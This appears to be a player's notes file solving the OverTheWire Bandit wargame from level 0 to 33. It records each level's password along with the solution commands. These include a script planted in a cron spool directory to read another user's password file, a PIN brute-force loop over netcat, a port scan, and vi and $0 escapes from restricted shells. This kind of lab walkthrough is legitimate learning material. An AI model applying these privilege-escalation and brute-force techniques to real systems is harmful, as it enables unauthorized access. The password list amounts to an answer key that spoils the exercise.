https://overthewire.org/wargames/bandit/
#brew install sshpass
#username:password are located in this notes.txt
#cat notes.txt |grep for LEVEL, use this command to ssh to next bandit server, update username

#level 0
ssh -p 2220 bandit0@bandit.labs.overthewire.org
bandit0:bandit0

#level 1
#cat readme |grep password| awk '{print $8}'
bandit1:6y2kwnwK6grgvwvpvLaa2T1cpFEKOhNR

#ssh -p 2220 bandit1@bandit.labs.overthewire.org
#cat notes.txt |grep '^bandit.*:'

#brew install sshpass
#sshpass -p "$(grep '^bandit0:' notes.txt | cut -d':' -f2)" ssh -p 2220 bandit0@bandit.labs.overthewire.org
LEVEL=bandit0; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" ssh -p 2220 ${LEVEL}@bandit.labs.overthewire.org

#level 2
#cat ./-
bandit2:PK8fYLZg2hnHSz83plBL1iEPKdD3QToB

#level 3
#cat ./--spaces\ in\ this\ filename--
bandit3:7ZZ2LFrykP2zEyvBl4m3clcL7tGYJPME

#level 4
# cd inhere
# cat ...Hiding-From-You
bandit4:xzTXq1rDJQVVAzdv5cHq1TQytTWufAMq

#level 5
#find . -type f -name "-*" -print0 | xargs -0 awk 'FNR==1{print "\n### FILE:", FILENAME, "###"} {print}'
# file ./-file*; cat ./-file07
bandit5:6C7h9GD8M6ai5nr7wo1RonrzFjj9yIrG

#level 6
# find ~/inhere -type f -size 1033c ! -executable -exec cat {} \;
bandit6:pXa26xhMWaC2SvDotA4r9EgZkulOeSBW

#level 7
#find / -type f -user bandit7 -group bandit6 -size 33c 2>/dev/null   
#/var/lib/dpkg/info/bandit7.password
bandit7:Bmnnvf82KzQlfxgAI2d1zYbr1u9pr3E3

#level 8
#cat data.txt |grep millionth|awk {'print $2'}
bandit8:VR1ljMayciFxbnUokuQmJFw6QC9VKtub

#level 9
#sort data.txt |uniq -u
bandit9:EjmOSvuAu7sGAHqHVcBDPirRe9T03kxl

#level 10
#grep -a '=.*=' data.txt
#strings data.txt|grep '=.*='
bandit10:B0s2khmbT9u0geKuOoVGW3JZKhndE3BG

#level 11
#cat data.txt | base64 -d| awk {'print $4'}
bandit11:pYfOY6HwUsDj5rL9UvyhU7MCmv8vN5Ro

#level 12
#cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'|awk {'print $4'}
bandit12:GROozWPO8QyN0mGrjUkID0WCYkZiQxrN

########################################################
#level 13
#$tmpdir=$(mktemp -d)
cp data.txt $tmpdir/data.txt
cd $tmpdir
# convert hexdump file back to raw binary, optional verify conversion xxd data.bin or hexdump -C data.bin
xxd -r data.txt > data.bin

# identify file type
file data.bin 
#data.bin: gzip compressed data, was "data2.bin", last modified: Wed Jun 24 14:58:46 2026, max compression, from Unix, original size modulo 2^32 580
#(the file is compress with gzip, cp data.bin to data.gz, use file to check file type)
cp data.bin data.gz
gzip -d data.gz

file data
#data: bzip2 compressed data, block size = 900k
#(the file is compressed with bzip2, mv data data.bz2)
mv data data.bz2
bzip2 -d data.bz2

file data
#data: gzip compressed data, was "data4.bin", last modified: Wed Jun 24 14:58:46 2026, max compression, from Unix, original size modulo 2^32 20480
#(the file is still compress with gzip, mv data data.gz)
mv data data.gz
gzip -d data.gz

file data
#data: POSIX tar archive (GNU)
cat data
#data5.bin0000644000000000000000000002400015216770246011252 0ustar  rootrootdata6.bin0000644000000002▒Mi▒000▒=M=@҃▒FF▒▒ ▒dh▒▒▒▒▒$▒▒F▒F▒▒`bƙ▒▒D▒▒▒▒▒▒▒=l▒"▒3▒▒▒▒1▒▒ ▒▒▒▒▒\@▒W▒▒P#▒t1▒▒LF|▒ ▒
#▒ED▒I▒▒▒x▒CI▒▒▒▒▒ѽ▒)▒U1▒唯͘▒rE8P▒%▒▒`
xxd data |head
#(the file is archived, need to use tar to extract the file)
mv data data.tar
tar -xf data.tar
# data5.bin is extracted out, which is another archived file
file data5.bin
#data5.bin: POSIX tar archive (GNU)
tar -xf data5.bin

# data6.bin is extracted, file data6.bin shows its compress with bzip2
file data6.bin
#data6.bin: bzip2 compressed data, block size = 900k
bzip2 -d data6.bin
bzip2: Can't guess original name for data6.bin -- using data6.bin.out

file data6.bin.out 
#(the file is another archived tar)
tar -xf data6.bin.out
#data8.bin is extracted out) 
#data8.bin: gzip compressed data, was "data9.bin", last modified: Wed Jun 24 14:58:46 2026, max comression, from Unix, original size modulo 2^32 49

mv data8.bin data8.gz
gzip -d data8.gz

file data8
#data8: ASCII text
cat data8
cat data8|awk {'print $4'}

bandit13:qQYQiHOBPR8zR61qxYqX45quvihF2uzk
####################################################################
#level 14
#localhost
LEVEL=bandit13; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" scp -P 2220 ${LEVEL}@bandit.labs.overthewire.org:/home/bandit13/sshkey.private .

chmod 600 sshkey.private
ssh -p 2220 -i sshkey.private bandit14@bandit.labs.overthewire.org  "cat /etc/bandit_pass/bandit14"
bandit14:aaWecNkG4FhxJQxz07uiwzVP6bJiYS65
###################################################################
#level 15
LEVEL=bandit14; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" ssh -p 2220 ${LEVEL}@bandit.labs.overthewire.org
echo "aaWecNkG4FhxJQxz07uiwzVP6bJiYS65" | nc localhost 30000
bandit15:pbLYuZtTg4MgaqfJx8jbA9gKKGqM68A7
##################################################################
#level 16
echo "pbLYuZtTg4MgaqfJx8jbA9gKKGqM68A7" | ncat --ssl localhost 30001 |awk 'NR==2 {print}'
#or
echo "pbLYuZtTg4MgaqfJx8jbA9gKKGqM68A7" | openssl s_client -quiet -connect localhost:30001
#or
echo "pbLYuZtTg4MgaqfJx8jbA9gKKGqM68A7" | socat - OPENSSL:localhost:30001,verify=0

bandit16:kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V
########################################################
#level 17
nmap -sV -T4 -p 31000-32000 localhost
or
echo "kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V" | nc -zv localhost 31000-32000 2>&1| grep succeeded
Connection to localhost (127.0.0.1) 31046 port [tcp/*] succeeded!
Connection to localhost (127.0.0.1) 31518 port [tcp/*] succeeded!
Connection to localhost (127.0.0.1) 31691 port [tcp/*] succeeded!
Connection to localhost (127.0.0.1) 31790 port [tcp/*] succeeded!
Connection to localhost (127.0.0.1) 31960 port [tcp/*] succeeded!

echo "kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V" | nc -zv localhost 31000-32000 2>&1| grep succeeded| awk '{print $5}'| xargs -I {} sh -c 'echo "###### Testing port: {} ######"; echo "kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V"| openssl s_client -quiet -connect localhost:{}'
###### Testing port: 31790 ######
echo "kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V"| openssl s_client -quiet -connect localhost:31790

#Use sed to grab data from line that starts with BEGIN, ends with line END

tmpdir=$(mktemp -d);echo "kS0Hf0u5HiXFwKMKFqXvPdOTNGGa0X8V"| openssl s_client -quiet -connect localhost:31790 | sed -n '/-----BEGIN OPENSSH PRIVATE KEY-----/,/-----END OPENSSH PRIVATE KEY-----/p' > "$tmpdir/private.key"

cd tmpdir
/tmp/tmp.R7qiFsjgkn

#update the temporary directory path to retreive the private.key, when using scp
LEVEL=bandit16; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" scp -P 2220 ${LEVEL}@bandit.labs.overthewire.org:/tmp/tmp.R7qiFsjgkn/private.key .

chmod 400 private.key
ssh -p2220 -i private.key bandit17@bandit.labs.overthewire.org
###################################################################
#level 17
ssh -p2220 -i private.key bandit17@bandit.labs.overthewire.org
diff passwords.new passwords.old
bandit18:OQxXZjELndr90zuhOTDYBEomI0SZITXI
###########################################
#level 18
LEVEL=bandit18; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" ssh -p 2220 ${LEVEL}@bandit.labs.overthewire.org
LEVEL=bandit18; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" ssh -p 2220 ${LEVEL}@bandit.labs.overthewire.org "cat readme"
###########################################
#level 19
bandit19:KpsOfPkcP7i1FlIExk2QEjyt6dw8dxZI
./bandit20-do cat /etc/bandit_pass/bandit20
bandit20:4pIjcunZ0fK2vmp3IwfG8Vf7VhxD6pOA
########################################
#level 20
ls -l
#total 16
#-rwsr-x--- 1 bandit21 bandit20 15604 Jun 24 14:58 suconnect
#bandit20@bandit:~$ echo "4pIjcunZ0fK2vmp3IwfG8Vf7VhxD6pOA" | nc -l -p 9091
#In another terminal logged in as bandit20
#bandit20@bandit:~$ ./suconnect 9091
bandit21:bW9kBv5WC3P4yoDyf12LSdGuNz5ka6hY

#########################################
#level 21
cat /usr/bin/cronjob_bandit22.sh
##!/bin/bash
#chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
#cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit22:RYVux2rHEm9tiXHmLFzuR7Vhx6AZQMEz
##########################################
#level 22
ls /etc/cron.d/
#behemoth4_cleanup  cronjob_bandit22  cronjob_bandit24  leviathan5_cleanup    otw-tmp-dir
#clean_tmp          cronjob_bandit23  e2scrub_all       manpage3_resetpw_job

cat cronjob_bandit23.sh
##!/bin/bash

#myname=$(whoami)
#mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
#echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
#cat /etc/bandit_pass/$myname > /tmp/$mytarget

#8ca319486bfbbc3663ea0fbe81326349 -
#cut -d ' ' -f 1
#8ca319486bfbbc3663ea0fbe81326349

#cat /tmp/8ca319486bfbbc3663ea0fbe81326349
#gKXDTAXnIz3OBxiPjRZ2uqutUlPZrBsw
bandit23:gKXDTAXnIz3OBxiPjRZ2uqutUlPZrBsw
#############################################
#level 23
cat /usr/bin/cronjob_bandit24.sh

#@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
#* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null

cat /usr/bin/cronjob_bandit24.sh

##!/bin/bash
#shopt -s nullglob
#myname=$(whoami)

#cd /var/spool/"$myname"/foo || exit
#echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
#for i in * .*;
#do
#    if [ "$i" != "." ] && [ "$i" != ".." ];
#    then
#        echo "Handling $i"
#        owner="$(stat --format "%U" "./$i")"
#        if [ "${owner}" = "bandit23" ] && [ -f "$i" ]; then
#            timeout -s 9 60 "./$i"
#        fi
#        rm -rf "./$i"
#    fi
#done

#(have write access in foo)
#bandit23@bandit:/tmp/temp$ ls -lah /var/spool/bandit24/
#total 12K
#dr-xr-x--- 3 bandit24 bandit23 4.0K Jun 24 14:59 .
#drwxr-xr-x 6 root     root     4.0K Jun 24 15:02 ..
#drwxrwx-wx 6 root     bandit24 4.0K Jul  8 21:03 foo

#create bash script to get the level 24 password stored in /etc/bandit_pass/bandit24
#note this file is only readable by user bandit24, we are currently logged in as user bandit23
#looking at the cronjob /usr/bin/cronjob_bandit24.sh is executed every minutes/hours/dom/month/dow , also shows that the script is executed if the server is rebooted.

#decipering the cronjob_bandit24.sh
#shopt -s nullglob  -> Bash shell setting, changes how shell heandles file pattern (globs) that does not match any existing files. 
# prevent logic error in loop
# without nullglob, a loop like for f in *.txt; do ... done will execute once, if no .txt files exist, setting the variable f to the string *.txt
# This may cause the script to try to process a file literally named *.txt.
# with empty expansion, the loop simly does not run, if a file pattern (glob) like * matches zero files, it should expand to nothing (an empty list) instead of expanding to the literal string *.

#myname=$(whoami) -> bandit24

#cd /var/spool/"$myname"/foo || exit  -> cd /var/spool/bandit24/foo , if unable to cd to this directory exit script
#echo "Executing and deleting all scripts in /var/spool/$myname/foo:" ->prints notification that any scripts in dir path /var/spool/bandit24/foo will be deleted  
#for i in * .*;  -> *: matches any non-hidden file in the current directory, ex: test.sh, data.txt, image.jpg
		 -> .*: match any thing that begins with a dot, including zero characters, ex: .bashrc, . , ..
#		 -> since .* matches . (current directory and .. (parent directory) safety check if [ "$i" != "." ] && [ "$i" != ".." ] is needed to prevent accidentally deleteing entire filesystem 

#do
#    if [ "$i" != "." ] && [ "$i" != ".." ]; -> prevent script from processing current directory and parent directory
#    then
#        echo "Handling $i"		     -> print filename of the current item in the loop from current directory 
#        owner="$(stat --format "%U" "./$i")" -> display file or filesystem status , --format "%U" tells stat to output only owner's username, 
#						 bandit23 should show up since I have cp script_level24.sh that is owned by bandit23
# 
#							     -> ######### Check Ownership & Type ############
#        if [ "${owner}" = "bandit23" ] && [ -f "$i" ]; then -> Authroization check, verifies if file is owned by only user bandit23 and is a regular file, then execute 
#							     -> [ -f "$i" ] safety check, -f is a file test operator in bash, checks if a file exists and is a regular file, 
#							     -> return false if directories, symbolic links, device files, sockets
#            timeout -s 9 60 "./$i"	-> executes the script in the current directory with a strict 60 second time limit before  -s 9 , signal 9 aka SIGKILL, which immediately terminates the process , only runs if criteria are met, if not met file is deleted and moves to next item
#        fi
#        rm -rf "./$i"			-> file will be delete regardless if criteria are met 
#    fi
#done

 
mkdir /tmp/temp
cd /tmp/temp
vi script_level24.sh
##!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/temp/password

# chmod 755, set permission rwxr-xr-x , grants Read + Execute permission to "others", which allow bandit24 to read and execute even if script is owned by bandit23
chmod 755 script_level24.sh
or
chmod u+x,o+rx script_level24.sh

#copy script_level24.sh over to /var/spool/bandit24/foo where the conjob is triggered
cp script_level24.sh /var/spool/bandit24/foo/

# create a file password so the password can be stored with cronjob is triggered
touch password

# grant full read,write,execute permission to file owner, group, and all users on system so bandit24 user can write password into the file
chmod 777 -R /tmp/temp

#bandit23@bandit:/var/spool/bandit24$ ls -lah
#total 12K
#dr-xr-x--- 3 bandit24 bandit23 4.0K Jun 24 14:59 .
#drwxr-xr-x 6 root     root     4.0K Jun 24 15:02 ..
#drwxrwx-wx 6 root     bandit24 4.0K Jul  8 22:19 foo

# note: only user bandit24 can read this file
#bandit23@bandit:/tmp/temp$ ls -lah /etc/bandit_pass/bandit24
#-r-------- 1 bandit24 bandit24 33 Jun 24 14:58 /etc/bandit_pass/bandit24

bandit24:hVQMk3lJNsmQ7VF3ubyrNNBom7BOgVXv
#################################
# level 24
netcat localhost 30002

#I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.

# brute force
##!/bin/bash
#
#for i in {0000..9999}; do
#        echo "hVQMk3lJNsmQ7VF3ubyrNNBom7BOgVXv $i"; done| nc -w 1 localhost 30002
bandit25:SoHfqMOEqIX2IYKVciZxvgpR9a2Djx4P
############################################
#level 25
cat /etc/passwd |grep bandit26
#bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

ls -lah /usr/bin/showtext
#-rwxr-xr-x 1 root root 58 Jun 24 14:59 /usr/bin/showtext

cat /usr/bin/showtext
##!/bin/sh
#export TERM=linux
#exec more ~/text.txt
#exit 0

cd /home/bandit25
#bandit25@bandit:~$ ls
#bandit26.sshkey

#copy  bandit26.sshkey to localhost system

LEVEL=bandit25; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" scp -P 2220 ${LEVEL}@bandit.labs.overthewire.org:/home/bandit25/bandit26.sshkey .

chmod 600 bandit26.sshkey
ssh -p 2220 -i bandit26.sshkey bandit26@bandit.labs.overthewire.org

#using putty resize window row to 5
#used puttygen and load bandit26.sshkey , save file bandit26.ppk for putty
#In side putty Connection>SSH>Auth>Credential> Private key file for authentication (select bandit26.ppk file)

#when prompted --More--, press v to open vi editor
#In the more and less pagers, pressing v is a built-in shortcut to edit the current file, in editor mode you can use colon e to open files
:e /etc/bandit_pass/bandit26
:set shell=/bin/bash
:shell

bandit26:jHdv2ELQhT22BkprMNDjybZDAkw1zeBJ

#############################################
#level 26
#note: cannot ssh directly from pc to bandit26, because of the restricted shell, use the level 25 resize trick
#putty bandit26.ppk , use v, 
:set shell=/bin/bash/
:shell

#bandit26@bandit:~$ ls
#bandit27-do  text.txt
 ./bandit27-do cat /etc/bandit_pass/bandit27
bandit27:STJLJBRRphMxKB392CT4iOr5CbzPU9ER
###########################################
#level 27

#There is a git repository at ssh://bandit27-git@bandit.labs.overthewire.org/home/bandit27-git/repo via the port 2220.
#The password for the user bandit27-git is the same as for the user bandit27.

#ssh://bandit27-git@bandit.labs.overthewire.org/home/bandit27-git/repo port 2220
#user:bandit27-git 
#password:STJLJBRRphMxKB392CT4iOr5CbzPU9ER

#git clone repo using level 27 password

#sshpass -p 'STJLJBRRphMxKB392CT4iOr5CbzPU9ER' git clone clone ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo

LEVEL=bandit27; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit27-git@bandit.labs.overthewire.org:2220/home/bandit27-git/repo
cat README
#The password to the next level is: y8Yd2ssKcpHpud7UvOSOxwamRMzIGIeQ
cat README | awk {'print $8'}
bandit28:y8Yd2ssKcpHpud7UvOSOxwamRMzIGIeQ
############################################
#level 28

#There is a git repository at ssh://bandit28-git@bandit.labs.overthewire.org/home/bandit28-git/repo via the port 2220.
#The password for the user bandit28-git is the same as for the user bandit28.

LEVEL=bandit28; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit28-git@bandit.labs.overthewire.org:2220/home/bandit28-git/repo

#README.md
# Bandit Notes
#Some notes for level29 of bandit.
## credentials
#- username: bandit29
#- password: xxxxxxxxxx

bandit29:xxxxxxxxxx
###########################################
#level 29

#There is a git repository at ssh://bandit29-git@bandit.labs.overthewire.org/home/bandit29-git/repo via the port 2220. 
#The password for the user bandit29-git is the same as for the user bandit29.

#user:bandit29-git
#password:xxxxxxxxxx

LEVEL=bandit29; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo 

git log

#commit 83d77407b76c9f86ac4e691a47618641c9d527ba (HEAD -> master, origin/master, origin/HEAD)
#Author: Morla Porla <morla@overthewire.org>
#Date:   Wed Jun 24 14:59:06 2026 +0000
#
#    fix info leak
#
#commit 13bbc4d2414ffe0439b8ee4f5e5c2949780cf4b3
#Author: Morla Porla <morla@overthewire.org>
#Date:   Wed Jun 24 14:59:06 2026 +0000
#
#    add missing data
#
#commit f3334fbccbf9446a6af88a3c71021c2f57163322
#Author: Ben Dover <noone@overthewire.org>
#Date:   Wed Jun 24 14:59:06 2026 +0000
#
#    initial commit of README.md
-----------------------------------------------------------

git show 83d77407b76c9f86ac4e691a47618641c9d527ba

#commit 83d77407b76c9f86ac4e691a47618641c9d527ba (HEAD -> master, origin/master, origin/HEAD)
#Author: Morla Porla <morla@overthewire.org>
#Date:   Wed Jun 24 14:59:06 2026 +0000
#
#    fix info leak
#
#diff --git a/README.md b/README.md
#index 42331d9..5c6457b 100644
#--- a/README.md
#+++ b/README.md
#@@ -4,5 +4,5 @@ Some notes for level29 of bandit.
# ## credentials
#
# - username: bandit29
#-- password: Em7eGtqaMySwNFjCpwzzHhLhospOcdt0
#+- password: xxxxxxxxxx

bandit29_30:Em7eGtqaMySwNFjCpwzzHhLhospOcdt0

LEVEL=bandit29_30; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit29-git@bandit.labs.overthewire.org:2220/home/bandit29-git/repo

ls
#README.md

# Bandit Notes
#Some notes for bandit30 of bandit.
#
## credentials
#
#- username: bandit30
#- password: <no passwords in production!>

git branch -a
#list all known branches

#* master
#  remotes/origin/HEAD -> origin/master
#  remotes/origin/dev
#  remotes/origin/master
#  remotes/origin/sploits-dev

git switch dev
cat README.md

- username: bandit30
- password: jq9Dfg2rXsfYsWMgFuKlXhphjdH7USgX

bandit30:jq9Dfg2rXsfYsWMgFuKlXhphjdH7USgX
#############################################
#level 30

#There is a git repository at ssh://bandit30-git@bandit.labs.overthewire.org/home/bandit30-git/repo via the port 2220. 
#The password for the user bandit30-git is the same as for the user bandit30

LEVEL=bandit30; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit30-git@bandit.labs.overthewire.org:2220/home/bandit30-git/repo

cat README.md
#just an epmty file... muahaha

git tag
or 
git tag -l
#secret

git show secret
#82NkymblpGBYmIXG6ZQ8YldBYstHpfUf

bandit31:82NkymblpGBYmIXG6ZQ8YldBYstHpfUf
###############################################
#level 31

#There is a git repository at ssh://bandit31-git@bandit.labs.overthewire.org/home/bandit31-git/repo via the port 2220.
#The password for the user bandit31-git is the same as for the user bandit31.

LEVEL=bandit31; sshpass -p "$(grep "^${LEVEL}:" notes.txt | cut -d':' -f2)" git clone ssh://bandit31-git@bandit.labs.overthewire.org:2220/home/bandit31-git/repo

cat README.md
#This time your task is to push a file to the remote repository.
#
#Details:
#    File name: key.txt
#    Content: 'May I come in?'
#    Branch: master

cat .gitignore
*.txt

echo 'May I come in?' > key.txt
git add -f key.txt
git commit -a
git commit -m "blah"
git push origin master

##bandit31-git@bandit.labs.overthewire.org's password:
#Enumerating objects: 4, done.
#Counting objects: 100% (4/4), done.
#Delta compression using up to 4 threads
#Compressing objects: 100% (2/2), done.
#Writing objects: 100% (3/3), 314 bytes | 314.00 KiB/s, done.
#Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
#remote: ### Attempting to validate files... ####
#remote:
#remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
#remote:
#remote: Well done! Here is the password for the next level:
#remote: pWuj5jBQ6IgV0NXwiH6g1pXRF8S1YvbT
#remote:
#remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
#remote:
#To ssh://bandit.labs.overthewire.org:2220/home/bandit31-git/repo
# ! [remote rejected] master -> master (pre-receive hook declined)
#error: failed to push some refs to 'ssh://bandit.labs.overthewire.org:2220/home/bandit31-git/repo'

#git remote -v
#origin  ssh://bandit31-git@bandit.labs.overthewire.org:2220/home/bandit31-git/repo (fetch)
#origin  ssh://bandit31-git@bandit.labs.overthewire.org:2220/home/bandit31-git/repo (push)

#option 1
#Crtl+v
# use j (down) or k (up)
# shift + I  
# type comment character #
# press esc

#option 2
#shift+v
#press :
#'<,'>'s/^/#/

bandit32:pWuj5jBQ6IgV0NXwiH6g1pXRF8S1YvbT
#######################################################
#level 32

#WELCOME TO THE UPPERCASE SHELL
#>> ls
#sh: 1: LS: Permission denied

$0
>> $0
$ ls -lah
total 36K
drwxr-xr-x   2 root     root     4.0K Jun 24 14:59 .
drwxr-xr-x 150 root     root     4.0K Jun 24 15:02 ..
-rw-r--r--   1 root     root      220 Feb 13 12:16 .bash_logout
-rw-r--r--   1 root     root     3.8K Jun 24 14:50 .bashrc
-rw-r--r--   1 root     root      807 Feb 13 12:16 .profile
-rwsr-x---   1 bandit33 bandit32  15K Jun 24 14:59 uppershell

$ whoami 
bandit33

$ cat /etc/bandit_pass/bandit33
u4P2CyPOwPGLe94RdD9Uo2FxFwvnFswM

bandit33:u4P2CyPOwPGLe94RdD9Uo2FxFwvnFswM
###########################################################
# level 33

bandit33@bandit:~$ ls
README.txt
bandit33@bandit:~$ cat README.txt
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!
